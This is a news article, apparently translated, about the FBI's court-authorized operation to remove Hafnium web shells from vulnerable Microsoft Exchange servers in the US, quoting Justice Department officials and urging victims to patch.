The FBI is hacking computers and servers infected with backdoors left by cybercriminals linked to the Chinese government in attacks on Microsoft Exchange servers, which began in early March. But instead of spying on the victims, the FBI’s goal is to remove the backdoor and look for more information about the attacks and their operators.
Attacks against servers equipped with Microsoft Exchange Server grew 1048% just one week after being identified by the Microsoft Threat Intelligence Center (MSTIC). The FBI operation has been approved by court officials, reports the United States Department of Justice (DOJ).
“The Department of Justice today announced a court-authorized operation to copy and remove malicious web shells from hundreds of vulnerable computers in the United States that run local versions of the Microsoft Exchange Server software used to provide enterprise-level email service.” , writes the DOJ in a press release, published on Tuesday (13).
According to Microsoft, which named the group Hafnium, the criminals are certainly funded by the Chinese state, but they do not operate in China and the main objective is cyber espionage. In the USA, more than 30,000 organizations have been compromised by cybercriminals, most of them government agencies, government service providers, armies and banks.
FBI operation against Hafnium
The FBI operation takes advantage of the same zero-day ports and vulnerabilities exploited by Hafnium cybercriminals. But instead of spying on the victim’s data, the FBI uses these paths to investigate cybercriminals who have access to that machine, in addition to removing the backdoors left by them.
“The court’s authorized removal of malicious web shells demonstrates the department’s commitment to stop hacking using all of our legal tools, not just the lawsuits,” said Deputy Attorney General John C. Demers of the National Security Division of DOJ.
Although the FBI campaign removes malware and the backdoor left by cybercriminals, they do not address vulnerabilities. That is, if the victim does not update his Microsoft Exchange, he remains vulnerable to attacks of this type. For this reason, the FBI said it was contacting the victims to update their local servers.
“Combating cyber threats requires partnerships with the private sector and government colleagues … We will continue to do this in coordination with our partners and the court to combat the threat until it is alleviated, and we can further protect our citizens from these malicious cyber breaches, ”said US acting prosecutor Jennifer B. Lowery.
The assistant director of the FBI’s Cyber Division explains that this operation is “a reminder to cybercriminals that the FBI will impose risks and consequences for crimes that threaten the national and public security of the American people.”
Sources: US Department of Justice; The Hack (1) and (two), TheHack.
